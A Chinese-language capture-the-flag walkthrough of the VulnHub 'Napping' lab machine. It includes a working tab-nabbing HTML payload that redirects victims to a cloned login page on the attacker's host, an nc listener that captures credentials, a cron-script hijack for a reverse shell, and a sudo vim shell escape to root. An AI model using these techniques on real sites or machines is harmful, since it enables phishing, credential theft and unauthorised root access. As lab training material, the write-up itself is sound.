前期准備:
靶機地址:https://www.vulnhub.com/entry/napping-101,752/
kali攻擊機ip:192.168.11.129
靶機地址:192.168.11.137
一、信息收集
1.使用nmap對靶機進行端口掃描
nmap -A -p 1-65535 192.168.11.137
發現開放了22和80端口。
2.收集80頁面的信息
發現是個登錄界面,還可以注冊,先注冊一個賬戶試試:
注冊完成后登錄進去:
發現有個輸入框,看樣子是提交連接,隨便寫入一個地址試試:
提交之后再點擊 Here 會跳轉到你輸入的連接:
查看源代碼,發現站點上的此特定 URL 鏈接功能容易受到 Tab Nabbing 的攻擊
二、漏洞攻擊
1.釣魚
知道了使用 Tab Nabbing 攻擊后,我們先做個釣魚界面,首先先復制登錄界面:
接下來,我們構建我們的惡意 html (sain.html)界面:
<!DOCTYPE html>
<html>
<body>
<script>
if(window.opener) window.opener.parent.location.replace('http://192.168.11.129:8000/index.html');
if(window.opener != window) window.opener.parent.location.replace('http://192.168.11.129:8000/index.html');
</script>
</body>
</html>
把自己復制的 index.php 和 sain.html 頁面放到 /var/www/html 下,並且開啟 python3-http 服務,開的 80 端口,和 sain.html 中的端口區分開:
監聽惡意 html 中的 8000 端口, nc -lvvp 8000 在靶機的提交連接界面提交 python3-http 服務下的 sain.html 地址:
點擊提交即可,等了一會監聽的 8000 端口返回了數據包:
靶機中設定的隔幾分鍾就會用用戶登錄,此時我們獲取了數據包
username=daniel
password=C@ughtm3napping123
得到了用戶名和密碼,我們可以通過ssh進行登錄。
2.ssh登錄
查看一下用戶信息:
可以看到 daniel 是管理員組的一部分。
使用 find 我們可以查找任何我們可以使用命令訪問的有趣文件
find / -group administrators -type f 2>/dev/null
查看一下 query.py 文件:
根據site_status.txt文件,它似乎每 2 分鍾執行一次:
三、提權
我們需要先跳轉到 adrian 用戶,所以我們繼續在 /dev/shm 目錄中創建一個反向 shell bash 腳本:
直接運行的話還是 daniel 用戶,我們需要更改一下 query.py 這個個腳本來讓他定時反彈shell:
nc 監聽,等了一會得到反向shell:
獲得 adrian 用戶,查看以下權限:
發現可以再沒有在沒有密碼的情況下以 root 身份運行 vim ,那就直接寫入 Vim-shell:
sudo /usr/bin/vim -c ':!/bin/sh'
得到root:
